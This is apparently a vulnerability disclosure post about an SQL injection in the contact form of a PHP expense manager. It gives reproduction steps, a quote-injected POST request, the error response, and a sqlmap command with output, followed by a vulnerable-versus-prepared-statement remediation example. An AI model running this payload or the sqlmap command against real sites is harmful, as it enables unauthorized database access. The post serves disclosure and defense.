Description
- INSERT INTO SQL injection found in the contact.php page
- SQLMap used to automate the exploitation
INSERT INTO SQL Injection
Steps to Reproduce:
- Visit the contact us page
- Add a word, e.g. "test", to the "Message" parameter
- Append a single quote to trigger the SQL syntax error
- Automate the process using SQLMap
// HTTP POST request
POST /expensemanager/contact.php HTTP/1.1
Host: 192.168.166.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
[...]
Name=test&Email=test%40test.test&Subject=tesst&Message=test%27%0D%0A
// HTTP response
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
[...]
[...]
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '')' at line 2 in C:\xampp\htdocs\expensemanager\contact.php:21
Stack trace:
#0 C:\xampp\htdocs\expensemanager\contact.php(21): mysqli_query(Object(mysqli), 'INSERT INTO fee...')
#1 {main}
thrown in <b>C:\xampp\htdocs\expensemanager\contact.php</b> on line <b>21</b><br />
[...]
// SQLMap in action
sqlmap --dbms=mysql --threads 10 -r request.txt --level 5 --risk 3 --banner
[...]
[23:13:30] [INFO] testing MySQL
[23:13:30] [INFO] confirming MySQL
[23:13:30] [INFO] the back-end DBMS is MySQL
[23:13:30] [INFO] fetching banner
[23:13:30] [INFO] resumed: '10.4.32-MariaDB'
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.4.32-MariaDB'
[...]
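The error above (a syntax error near "')" on line 2 of an INSERT statement, raised from mysqli_query) is what string concatenation into a multi-line INSERT looks like when a quote lands in one of the fields. The following is an added example, not the application's own contact.php: a minimal reconstruction of that vulnerable pattern next to a hardened version using a prepared statement. The table name contact_messages and the column names are assumptions.

```php
<?php
// Added example, not the application's own code. Table and column names are assumptions.
// The mysqli_sql_exception in the response is PHP 8.1+ default behaviour
// (MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); with display_errors=On the
// query fragment and file path end up in the HTTP response, as seen above.

// VULNERABLE: POST fields are concatenated straight into a two-line INSERT.
// A single quote in Message closes the string early, so the DBMS reports a
// syntax error near "')" on line 2 of the statement.
function save_message_vulnerable(mysqli $db, array $post): bool
{
    $sql = "INSERT INTO contact_messages (name, email, subject, message)
VALUES ('{$post['Name']}', '{$post['Email']}', '{$post['Subject']}', '{$post['Message']}')";
    return mysqli_query($db, $sql);
}

// HARDENED: a prepared statement sends query text and values separately, so a
// quote (or anything else) in a field is stored literally and cannot change the
// statement. Validation of the e-mail address is kept as a second, independent check.
function save_message_hardened(mysqli $db, array $post): bool
{
    $name    = (string) ($post['Name'] ?? '');
    $email   = (string) ($post['Email'] ?? '');
    $subject = (string) ($post['Subject'] ?? '');
    $message = (string) ($post['Message'] ?? '');

    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false; // reject malformed addresses before touching the database
    }

    $stmt = $db->prepare(
        'INSERT INTO contact_messages (name, email, subject, message) VALUES (?, ?, ?, ?)'
    );
    $stmt->bind_param('ssss', $name, $email, $subject, $message);
    return $stmt->execute();
}

// Production setting that keeps the stack trace out of the HTTP response even if
// a query does fail (php.ini: display_errors=Off, log_errors=On), set here at runtime.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

Wrapping the database call in a try/catch for mysqli_sql_exception and returning a generic message to the client is the matching application-level change; the exception itself still goes to the server log.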
Conclusion
- Had lots of fun fuzzing the application
- Until next Friday!
- Cheers
Can you link to the vendor please?
Hey VulnDB,
It's an app that I found on GitHub, however I don't have the link. Sorry!